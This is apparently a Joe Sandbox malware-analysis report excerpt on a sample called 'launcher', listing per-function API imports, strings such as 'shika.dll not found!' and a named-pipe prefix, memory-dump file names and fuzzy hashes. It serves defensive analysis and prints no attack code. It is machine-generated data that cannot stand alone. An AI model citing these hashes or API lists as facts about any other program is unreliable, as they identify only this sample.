Opcode Fuzzy Hash: 968243078c40e10867e4de63eccb85ee393b3a09ce00fb51caa253e39107af3a
Instruction Fuzzy Hash: CB218673629A8686DB10AF15EA8076DB760FB41B84FA08031CB4D03B60DF3CE164CB20

Function 00007FF77E088DC8 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 37processCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF77E081070: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF77E081094
Part of subcall function 00007FF77E081070: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF77E0810B5

system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF77E088DDE

Strings

shika.dll not found!, xrefs: 00007FF77E088DCC
H, xrefs: 00007FF77E088DC8
pause, xrefs: 00007FF77E088DD7

Memory Dump Source

Source File: 00000006.00000002.3729904812.00007FF77E081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF77E080000, based on PE: true

Associated: 00000006.00000002.3729664833.00007FF77E080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730975436.00007FF77E0AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3731351405.00007FF77E0B0000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff77e080000_launcher.jbxd

Similarity

API ID: __acrt_iob_func__stdio_common_vfprintfsystem
String ID: H$pause$shika.dll not found!
API String ID: 498820738-1958852774
Opcode ID: 1cd8caf9b23bbbe98ebb23c83919ac0db340b2c2e30c94db207d6a52cdb87dc5
Instruction ID: 87d31bfeb6bb5cb6891b6f532c611079935c33060f3c3bf534e3684baeac01a9
Opcode Fuzzy Hash: 1cd8caf9b23bbbe98ebb23c83919ac0db340b2c2e30c94db207d6a52cdb87dc5
Instruction Fuzzy Hash: 1C115223A386C184EB60EF24D8492EDA322FB84784FE05032CE4D07A59DF7DE541C360

Function 00007FF77E087EA0 Relevance: 6.4, APIs: 5, Instructions: 129COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FF77E087ED4
memcpy.VCRUNTIME140 ref: 00007FF77E087F1D
memcpy.VCRUNTIME140 ref: 00007FF77E087F4B
memset.VCRUNTIME140 ref: 00007FF77E087F62

Memory Dump Source

Source File: 00000006.00000002.3729904812.00007FF77E081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF77E080000, based on PE: true

Associated: 00000006.00000002.3729664833.00007FF77E080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730975436.00007FF77E0AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3731351405.00007FF77E0B0000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff77e080000_launcher.jbxd

Similarity

API ID: memcpymemset
String ID:
API String ID: 1297977491-0
Opcode ID: 89f150f559536b6f22d8ffdcc1b1f01da6862967420492a78edb28649569ddae
Instruction ID: 5aedc47620b8a309332c2947340a0479621b5553acccad1c54a693bb239af281
Opcode Fuzzy Hash: 89f150f559536b6f22d8ffdcc1b1f01da6862967420492a78edb28649569ddae
Instruction Fuzzy Hash: C6412527B396D182EB24DB2985852ADA795FB017C0F948031DB5C57F86DB3DF919C320

Function 000001EDF16614B4 Relevance: 6.3, APIs: 5, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001EDF16614D5
HeapFree.KERNEL32 ref: 000001EDF16614E4
GetProcessHeap.KERNEL32 ref: 000001EDF16614F0
HeapFree.KERNEL32 ref: 000001EDF16614FF
GetProcessHeap.KERNEL32 ref: 000001EDF166152A

Memory Dump Source

Source File: 00000006.00000002.3728761881.000001EDF1660000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001EDF1660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1edf1660000_launcher.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: f6d12f743daa531661d67c8d0c6aa9b40bb3fa98b29ef9a3726c759b29aa9ec0
Instruction ID: c3ff06bba5b61bb07c23c015e9d87e881a8a29becdf5e44f3eec1e82c7264e0b
Opcode Fuzzy Hash: f6d12f743daa531661d67c8d0c6aa9b40bb3fa98b29ef9a3726c759b29aa9ec0
Instruction Fuzzy Hash: 1D11F831615B88D6E754DB66F84429E73B0F78AB85F044129DF9B03B56DF38C0528744

Function 00007FF77E09BA00 Relevance: 6.3, APIs: 4, Instructions: 290COMMON

Download Yara Rule

APIs

?tolower@?$ctype@D@std@@QEBADD@Z.MSVCP140(?,?,00000000,00007FF77E09A26F,?,?,00007FF77E088C2E,00007FF77E098C27,00000000,?,00007FF77E088C2E,00007FF77E088C87,00007FF77E0953E0,?,?,?), ref: 00007FF77E09BAB9

Memory Dump Source

Source File: 00000006.00000002.3729904812.00007FF77E081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF77E080000, based on PE: true

Associated: 00000006.00000002.3729664833.00007FF77E080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730975436.00007FF77E0AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3731351405.00007FF77E0B0000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff77e080000_launcher.jbxd

Similarity

API ID: ?tolower@?$ctype@D@std@@
String ID:
API String ID: 1228470278-0
Opcode ID: 9471dde64f6eac1c375a2d7c632320e80ad8a981e08a7be8ddfe83b6678514e9
Instruction ID: ac8d5aa68d938a46e81fce3802dbf0d03db83edf23d8acc44afe223b3e856571
Opcode Fuzzy Hash: 9471dde64f6eac1c375a2d7c632320e80ad8a981e08a7be8ddfe83b6678514e9
Instruction Fuzzy Hash: 04C11823A3879186E754AF25C054378B7A2EB95B54FA84132DA8D033D9DF3DF881C721

Function 00007FF77E09F5F0 Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

_Min_value.LIBCPMTD ref: 00007FF77E09F68A
memcpy.VCRUNTIME140 ref: 00007FF77E09F6B9
?always_noconv@codecvt_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF77E09F6D7
allocator.LIBCONCRTD ref: 00007FF77E09F757

Memory Dump Source

Source File: 00000006.00000002.3729904812.00007FF77E081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF77E080000, based on PE: true

Associated: 00000006.00000002.3729664833.00007FF77E080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730975436.00007FF77E0AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3731351405.00007FF77E0B0000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff77e080000_launcher.jbxd

Similarity

API ID: ?always_noconv@codecvt_base@std@@Min_valueallocatormemcpy
String ID:
API String ID: 2334965429-0
Opcode ID: eca008ae4e7d8ca58baca810316bf8028919e9d476a7f50fe2f293a4bffab5bd
Instruction ID: 5c30e76100b3adf73bccf8dc33b6f7fe22942089c47613e180a4b19e6689b59d
Opcode Fuzzy Hash: eca008ae4e7d8ca58baca810316bf8028919e9d476a7f50fe2f293a4bffab5bd
Instruction Fuzzy Hash: 37417F23B34A8599E700EFB1D4511FDA3B0EB54788FA08132EE5D27A9ADE3CE555C350

Function 00007FF77E0930E0 Relevance: 6.1, APIs: 4, Instructions: 100COMMON

Download Yara Rule

APIs

_Max_value.LIBCPMTD ref: 00007FF77E09312A
_Min_value.LIBCPMTD ref: 00007FF77E093149

Part of subcall function 00007FF77E094970: _Max_value.LIBCPMTD ref: 00007FF77E0949B6
Part of subcall function 00007FF77E094970: _Min_value.LIBCPMTD ref: 00007FF77E0949D5
Part of subcall function 00007FF77E094970: _Max_value.LIBCPMTD ref: 00007FF77E094A13

memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,00000000,00007FF77E085EC0), ref: 00007FF77E0931B2
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF77E093230

Memory Dump Source

Source File: 00000006.00000002.3729904812.00007FF77E081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF77E080000, based on PE: true

Associated: 00000006.00000002.3729664833.00007FF77E080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730975436.00007FF77E0AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3731351405.00007FF77E0B0000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff77e080000_launcher.jbxd

Similarity

API ID: Max_value$Min_value$Concurrency::cancel_current_taskmemcpy
String ID:
API String ID: 952001462-0
Opcode ID: c8a5c8a0e7668d558c2cdd87d69d0a3dde868de801f87a5c161f05c6f72c8853
Instruction ID: f715366b20c24ec4ce596a6a6f2d0ff64456b7a473f3d7e235fd9714bbaebd3d
Opcode Fuzzy Hash: c8a5c8a0e7668d558c2cdd87d69d0a3dde868de801f87a5c161f05c6f72c8853
Instruction Fuzzy Hash: D8318033638A4195DA14EF12E4541BAE361FB98BE0FA44631EE9D87B95DF3CE141C710

Function 00007FF77E095E00 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

_Min_value.LIBCPMTD ref: 00007FF77E095E3B

Part of subcall function 00007FF77E0988B0: _Min_value.LIBCPMTD ref: 00007FF77E0988F0

memset.VCRUNTIME140(?,?,?,?,?,?,00007FF77E08FFEE,?,?,?,?,?,?,?,00007FF77E08FD84), ref: 00007FF77E095E9E
memcpy.VCRUNTIME140(?,?,?,?,?,?,00007FF77E08FFEE,?,?,?,?,?,?,?,00007FF77E08FD84), ref: 00007FF77E095ECB
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF77E095F0F

Memory Dump Source

Source File: 00000006.00000002.3729904812.00007FF77E081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF77E080000, based on PE: true

Associated: 00000006.00000002.3729664833.00007FF77E080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730975436.00007FF77E0AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3731351405.00007FF77E0B0000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff77e080000_launcher.jbxd

Similarity

API ID: Min_value$Concurrency::cancel_current_taskmemcpymemset
String ID:
API String ID: 3157264796-0
Opcode ID: eac6d3efff3015e66befc36976c4ea4ff434cf063746dff1dc755f6169deb9ed
Instruction ID: 71b34d56412dd4d136545804e6d70a9a255638769585437c0999eaeccfd86744
Opcode Fuzzy Hash: eac6d3efff3015e66befc36976c4ea4ff434cf063746dff1dc755f6169deb9ed
Instruction Fuzzy Hash: 40318E73635A8586EA14AF36D4001A9A355FB44BF4FA48332EA6C077D9DE3CE102C320

Function 00007FF77E08ECF6 Relevance: 6.1, APIs: 4, Instructions: 60stringCOMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF77E08EEC8
Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF77E08EED8
strtoull.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF77E08EEE9
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF77E08EEF2

Memory Dump Source

Source File: 00000006.00000002.3729904812.00007FF77E081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF77E080000, based on PE: true

Associated: 00000006.00000002.3729664833.00007FF77E080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730975436.00007FF77E0AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3731351405.00007FF77E0B0000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff77e080000_launcher.jbxd

Similarity

API ID: _errno$Concurrency::details::EmptyQueue::StructuredWorkstrtoull
String ID:
API String ID: 34875580-0
Opcode ID: 17cd8c471fd30891659d36812a18a46c13b9007c252d2734a6609d9248ccee3c
Instruction ID: 1a83830389c9797dd6b623b52c51c0e40702155a4959391d0a92b85be95f4766
Opcode Fuzzy Hash: 17cd8c471fd30891659d36812a18a46c13b9007c252d2734a6609d9248ccee3c
Instruction Fuzzy Hash: 70218323A3865286EB24AF24A45027DB7A0FB48B98F944131DE4D4379ACF3CF446C720

Function 00007FF77E08EDE9 Relevance: 6.1, APIs: 4, Instructions: 58stringCOMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF77E08EEC8
Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF77E08EED8
strtoull.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF77E08EEE9
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF77E08EEF2
Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF77E08EF13
strtoll.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF77E08EF24
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF77E08EF2D

Memory Dump Source

Source File: 00000006.00000002.3729904812.00007FF77E081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF77E080000, based on PE: true

Associated: 00000006.00000002.3729664833.00007FF77E080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730975436.00007FF77E0AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3731351405.00007FF77E0B0000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff77e080000_launcher.jbxd

Similarity

API ID: _errno$Concurrency::details::EmptyQueue::StructuredWork$strtollstrtoull
String ID:
API String ID: 4052273906-0
Opcode ID: 6b9969244f46ae33d49979801b4ec63a3f6b4c2d443d33e478609564507cc259
Instruction ID: aaec6414940807512df10b6bb42d120577317f620c6c8f2eea427c8ef4d854f5
Opcode Fuzzy Hash: 6b9969244f46ae33d49979801b4ec63a3f6b4c2d443d33e478609564507cc259
Instruction Fuzzy Hash: D6214C23A3C65685EB25AF24A85017DB7A0FB48B98FA44131DE4D4678ACE3CF456C731

Function 00007FF77E08ED38 Relevance: 6.1, APIs: 4, Instructions: 57stringCOMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF77E08EEC8
Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF77E08EED8
strtoull.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF77E08EEE9
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF77E08EEF2
Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF77E08EF13
strtoll.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF77E08EF24
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF77E08EF2D

Memory Dump Source

Source File: 00000006.00000002.3729904812.00007FF77E081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF77E080000, based on PE: true

Associated: 00000006.00000002.3729664833.00007FF77E080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730975436.00007FF77E0AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3731351405.00007FF77E0B0000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff77e080000_launcher.jbxd

Similarity

API ID: _errno$Concurrency::details::EmptyQueue::StructuredWork$strtollstrtoull
String ID:
API String ID: 4052273906-0
Opcode ID: 00c4807e29321a5b0d4fd23f5ed2fe6cb806d777b83250010c7887e15ec7db82
Instruction ID: 94077d7adbffcddaa3beaa895bbe768f2ecf35b7577ed11fd9a31b6a1aee24f6
Opcode Fuzzy Hash: 00c4807e29321a5b0d4fd23f5ed2fe6cb806d777b83250010c7887e15ec7db82
Instruction Fuzzy Hash: BC216D23A3865686EB25BF24A45027DB7A0FB49B98FA40131DE4D4278ACE3CF452C730

Function 00007FF77E08EDB5 Relevance: 6.1, APIs: 4, Instructions: 57stringCOMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF77E08EEC8
Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF77E08EED8
strtoull.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF77E08EEE9
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF77E08EEF2

Memory Dump Source

Source File: 00000006.00000002.3729904812.00007FF77E081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF77E080000, based on PE: true

Associated: 00000006.00000002.3729664833.00007FF77E080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730975436.00007FF77E0AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3731351405.00007FF77E0B0000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff77e080000_launcher.jbxd

Similarity

API ID: _errno$Concurrency::details::EmptyQueue::StructuredWorkstrtoull
String ID:
API String ID: 34875580-0
Opcode ID: 1df90b1e931c5de88012b4cd4ed6d0ae4bfb5c0edc069d98f0601a93339be9a4
Instruction ID: a665337a93a21418959ed43ef69e2319a981d6fd8a74b606614f519341e44751
Opcode Fuzzy Hash: 1df90b1e931c5de88012b4cd4ed6d0ae4bfb5c0edc069d98f0601a93339be9a4
Instruction Fuzzy Hash: E3219D23A3865285EB24BF24A41027DB7A0FF48B98FA40131DE4D4678ACE3CF842C770

Function 00007FF77E08EE4D Relevance: 6.1, APIs: 4, Instructions: 57stringCOMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF77E08EEC8
Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF77E08EED8
strtoull.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF77E08EEE9
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF77E08EEF2

Memory Dump Source

Source File: 00000006.00000002.3729904812.00007FF77E081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF77E080000, based on PE: true

Associated: 00000006.00000002.3729664833.00007FF77E080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730975436.00007FF77E0AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3731351405.00007FF77E0B0000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff77e080000_launcher.jbxd

Similarity

API ID: _errno$Concurrency::details::EmptyQueue::StructuredWorkstrtoull
String ID:
API String ID: 34875580-0
Opcode ID: 4a852317762d36f17ae6ab6bf59f0db6cd4886af388350e42d13a848d4e5b2de
Instruction ID: 5f04532cbfd62f2b45f34edf86d841ce916e9d1c8fc09d84402615186afdbe48
Opcode Fuzzy Hash: 4a852317762d36f17ae6ab6bf59f0db6cd4886af388350e42d13a848d4e5b2de
Instruction Fuzzy Hash: BF216F23A3865282EB24AF24A41017DB7A0FB49B98FA40131DE4D46799CE3CF456C760

Function 00007FF77E083870 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

?_Fiopen@std@@YAPEAU_iobuf@@PEBDHH@Z.MSVCP140 ref: 00007FF77E0838B2

Memory Dump Source

Source File: 00000006.00000002.3729904812.00007FF77E081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF77E080000, based on PE: true

Associated: 00000006.00000002.3729664833.00007FF77E080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730975436.00007FF77E0AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3731351405.00007FF77E0B0000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff77e080000_launcher.jbxd

Similarity

API ID: Fiopen@std@@U_iobuf@@
String ID:
API String ID: 2284775142-0
Opcode ID: e086bf69ba3ca677b259146f4382829b42f00f89e150505cc03584412f1705bc
Instruction ID: 0498d5dc7b806ffe873106d717131024c4223fad8cce7e46f674ad076a3a7a43
Opcode Fuzzy Hash: e086bf69ba3ca677b259146f4382829b42f00f89e150505cc03584412f1705bc
Instruction Fuzzy Hash: 2621BA3293CB8586D660AB15E48032EB7A4FBC4B80F601135EACE47B68DF3CE555CB10

Function 00007FF77E09F984 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 00007FF77E09F9CD
GetLastError.KERNEL32 ref: 00007FF77E09F9DB
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00007FF77E0903D0), ref: 00007FF77E09FA10
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00007FF77E0903D0), ref: 00007FF77E09FA1E

Memory Dump Source

Source File: 00000006.00000002.3729904812.00007FF77E081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF77E080000, based on PE: true

Associated: 00000006.00000002.3729664833.00007FF77E080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730975436.00007FF77E0AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3731351405.00007FF77E0B0000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff77e080000_launcher.jbxd

Similarity

API ID: ByteCharErrorLastMultiWide
String ID:
API String ID: 203985260-0
Opcode ID: 1e14402a473faeb0525be0cffde613d1b7be974143eb292021b777c2502e6087
Instruction ID: d0ba8a77573eb3feadb4a420834d30dfd5a86a5cb96e53a680bcd7ec484cbaf3
Opcode Fuzzy Hash: 1e14402a473faeb0525be0cffde613d1b7be974143eb292021b777c2502e6087
Instruction Fuzzy Hash: AF212C73A38B458AE3209F11E44432EB6B4F789B94F640134DB8957B54DF3DE411CB10

Function 00007FF77E082710 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 193COMMON

Download Yara Rule

Strings

, xrefs: 00007FF77E082963

Memory Dump Source

Source File: 00000006.00000002.3729904812.00007FF77E081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF77E080000, based on PE: true

Associated: 00000006.00000002.3729664833.00007FF77E080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730975436.00007FF77E0AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3731351405.00007FF77E0B0000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff77e080000_launcher.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: ff77d09e7ac4f191d433e813f39c41f2ecbf47ae4cb72c9e641ff25254f91ddd
Instruction ID: a6a8df754c123101d582c383cf4e35e0e1cb29c03081ddda0a444b2642c5b46b
Opcode Fuzzy Hash: ff77d09e7ac4f191d433e813f39c41f2ecbf47ae4cb72c9e641ff25254f91ddd
Instruction Fuzzy Hash: F2B1B43751DBC58AD6719B29E0403AABBA0F789750F604226EADD43BA9DF3CE454CF10

Function 000001EDF16626F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000001EDF16627D4
StrCpyW.SHLWAPI ref: 000001EDF16627ED

Strings

\\.\pipe\, xrefs: 000001EDF16627DF

Memory Dump Source

Source File: 00000006.00000002.3728761881.000001EDF1660000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001EDF1660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1edf1660000_launcher.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction ID: 749089bd7876bc0c7c0e277f02b4f111c0b32199351effee0051830b2570a2c5
Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction Fuzzy Hash: E5719D322007C186EB64DA36E9543EE76D4F786BC8F44411EEE4B4BB8BDE34CA068740

Function 000001EDF16624DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000001EDF16625C3
StrCpyW.SHLWAPI ref: 000001EDF16625DA

Strings

\\.\pipe\, xrefs: 000001EDF16625CE

Memory Dump Source

Source File: 00000006.00000002.3728761881.000001EDF1660000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001EDF1660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1edf1660000_launcher.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction ID: 118037b312816dec5a8ddcc1dc5f3cd0b694e286f2c3efcaeb323bc6b3f17122
Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction Fuzzy Hash: 9F5191322047D142EB74DA39F5583EE76D5F386B88F05412DDD8B4BB9BCA35C8468B40

Function 00007FF77E086950 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

__std_fs_code_page.MSVCPRT ref: 00007FF77E086999

Part of subcall function 00007FF77E09F7F0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,?,00007FF77E0862D9), ref: 00007FF77E09F7F4
Part of subcall function 00007FF77E09F7F0: AreFileApisANSI.KERNEL32(?,?,?,?,00007FF77E0862D9), ref: 00007FF77E09F803

Strings

: ", xrefs: 00007FF77E086A6A
", ", xrefs: 00007FF77E086AA0

Memory Dump Source

Source File: 00000006.00000002.3729904812.00007FF77E081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF77E080000, based on PE: true

Associated: 00000006.00000002.3729664833.00007FF77E080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730975436.00007FF77E0AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3731351405.00007FF77E0B0000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff77e080000_launcher.jbxd

Similarity

API ID: ApisFile___lc_codepage_func__std_fs_code_page
String ID: ", "$: "
API String ID: 3680818584-747220369
Opcode ID: 168466ee87f4dab03ddacfcc116974314d6c58f9a428e41dc7c3ffb025a4ae04
Instruction ID: 84197b3e4c777ddfb8b20e3aec11d413162adc94c3cf1508313e44ead0ffe877
Opcode Fuzzy Hash: 168466ee87f4dab03ddacfcc116974314d6c58f9a428e41dc7c3ffb025a4ae04
Instruction Fuzzy Hash: 54415E23B34A5099FB00EFA5E4512EC6361EB58B88F905431EE4D66B99DF3CE255C3A0

Function 00007FF77E087540 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON

Download Yara Rule

APIs

char_traits.LIBCPMTD ref: 00007FF77E087635
char_traits.LIBCPMTD ref: 00007FF77E087694

Strings

[json.exception., xrefs: 00007FF77E08762E, 00007FF77E08763D

Memory Dump Source

